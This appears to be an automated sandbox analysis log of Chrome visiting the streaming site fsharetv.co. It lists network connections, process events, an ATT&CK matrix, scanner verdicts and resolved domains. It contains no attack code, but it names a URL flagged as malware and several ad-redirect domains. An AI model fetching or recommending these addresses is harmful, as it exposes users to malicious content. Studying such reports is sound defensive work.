Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: classification engineClassification label: mal52.win@30/342@68/27
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2016,i,16068684791565395002,4372320431885380425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fsharetv.co/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2016,i,16068684791565395002,4372320431885380425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://fsharetv.co/0%Avira URL Cloudsafe
https://fsharetv.co/2%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://images.fsharetv.co/wxbjvkqyvr.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/jwjzcdhlaa.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/ibemluawsg.jpg0%Avira URL Cloudsafe
https://lgzmq.employmehnt.com/block.js?b=4100%Avira URL Cloudmalware
https://images.fsharetv.co/myhjkmlzkv.jpg0%Avira URL Cloudsafe
https://ad-maven.com/publisher-terms-of-service/0%Avira URL Cloudsafe
https://images.fsharetv.co/dupfykwpkr.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/hlpzqetjdc.jpg0%Avira URL Cloudsafe
https://bineukdwithme.com/Q2xwVmNsUxMlXhQ7KSw5KD4AABQBPhQRVhsvHDJRISpIHjUbKVYiCidRQWZacV5HbkUzBRRrUmUfBDcXNh9NZVNzXlY/DSUDTWdXbVhAZ0U1UUF4UHdCQ2BNd0oFa1JlGAA3BH5dViYXNwBNZ1RwWEJgUXRcRmdRdQ0%Avira URL Cloudsafe
https://feenotifyfriends.info/media/manage/images/logo-square.png?b=70%Avira URL Cloudsafe
https://images.fsharetv.co/mzqsdvvvgn.jpg0%Avira URL Cloudsafe
https://bineukdwithme.com/T29ORHpgUC03RwEpFHQ3NSYLHkosKg8jNCE7Hw07Djh3BTsODGgwEytSf3RDfV15fFw/Bip5S2kcOiUOOhxzcVwmASgrR2kZc3VUfFtgd0xhW2gxR35JOjQbKFJ/Ygo7GyJ5S3hcenZMfVl3dU19Ww0%Avira URL Cloudsafe
https://images.fsharetv.co/kwwlpoxmkw.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/lsznwkzkeg.jpg0%Avira URL Cloudsafe
https://bineukdwithme.com/U1VLT0N8aig8fgECPxsZFBN4Gi4ZMR18CTAMJwkSNzl+PhUFAG07Kjdoen96YG1yd2UjPC9ycmtzODsiJyA4cnJ1PCUpLG5zPXJyfWVlfW1mcz5ycnUhOy4kbmRtPzcnOXZ+dGBheXlxZWJ8fHpm0%Avira URL Cloudsafe
https://images.fsharetv.co/mhbmmtnqkc.jpg0%Avira URL Cloudsafe
https://fsharetv.co/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js0%Avira URL Cloudsafe
https://images.fsharetv.co/vefympkwgl.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/ntccrcrfbq.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/xzgbqwqnzf.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/nypxzfnccp.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/qxdsikxvmh.jpg0%Avira URL Cloudsafe
https://bineukdwithme.com/WmFKYlZ1XikRazg0DxUFHAkuARcURHgkNxwRPSEONhAdKjEfBHhScC4ILl9nalh4UGFiRzoLMmdQbBEiOxU/EWtpRyMMMDVcJw0jKQQuDSE0RzxfZ3RSfkxlbE9+RCNnUGwWJjsGd1NwKhU+DmtrVnlWZGxTfFpuYldz0%Avira URL Cloudsafe
https://gdplayer.vip0%Avira URL Cloudsafe
https://images.fsharetv.co/qqtsmisech.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/sbpyzixmgg.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/jxyborotiz.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/nrythsbhxb.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/ctuuyqjswl.jpg0%Avira URL Cloudsafe
https://images.fsharetv.co/ysyyscafvj.jpg0%Avira URL Cloudsafe
https://arketingefifortw.com/MnB6NXdTEhlYSFNNGBMCQBxHEEV0VUhzEwAHQ1YTR0hOTRQGFQsbFF4fD1ERQB8UQVlcFQ4QRXQcN30bBiQ+WSN0GCNENVkhK30/dzk7cDV5Fh0BPmoHHRBFcCg8bzJ6GkNnImMDHnoyChU9XRNDJUp4IHQaDXATWjUNejJzNilnQhdCPHY/VVVIdz5zFxxnNn8TGWcmdCgCZANkQR5wL1scImBHYDobWR9nN0pjQ3pAK38xSxM/Yg9BJzFwD2Y2K3wQZxgjeDBqNi9tAH8iM3MhYCg/Wjx2Mk9/L2pEMHI2BiIzWUZUNB1BB3EHO20zdRs2dDJaOSNSHGQjEBgHQjMNdDh3IzNlNXQINnEfRTMpZDUENChZFGEeAmwmcxsvfiIHJj1NOl4kKGM7Yh4RfjUDFDZQH0UzKWM2XCUvZCJ0NxF5FAMIMVMxZCo/XUZCMw10EnojQ2YvAzIeUxBeJD9kGFgmPGMUYRcVfDZnRS1TNVExLAUfQjMNdDx1IwpsJloyHlMZCjYpXk5bMx1vEXYoP3xRWAMVWwcPNhJ9A0tFSlNEAzg9bTM0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.193.229
truefalse
    high
    ukankingwithea.com
    104.21.48.1
    truefalse
      high
      star-mini.c10r.facebook.com
      157.240.195.35
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          ghabovethec.info
          18.165.220.113
          truefalse
            high
            bineukdwithme.com
            172.67.183.159
            truefalse
              high
              fsharetv.co
              104.21.10.158
              truefalse
                high
                media.amazon.map.fastly.net
                151.101.193.16
                truefalse
                  high
                  getrunkhomuto.info
                  108.158.75.43
                  truefalse
                    high
                    d2w9cdu84xc4eq.cloudfront.net
                    108.158.71.140
                    truefalse
                      high
                      arketingefifortw.com
                      13.227.8.77
                      truefalse
                        high
                        youtube-ui.l.google.com
                        142.250.181.78
                        truefalse
                          high
                          nostop.go2cloud.org
                          18.202.12.61
                          truefalse
                            high
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              high
                              kenwellsgrpo.com
                              54.225.185.110
                              truefalse
                                high
                                www.google.com
                                142.250.181.100
                                truefalse
                                  high
                                  birthjeans.icu
                                  172.67.161.217
                                  truefalse
                                    high
                                    images.fsharetv.co
                                    172.67.131.140
                                    truefalse
                                      high
                                      www.facebook.com
                                      unknown
                                      unknownfalse
                                        high
                                        m.media-amazon.com
                                        unknown
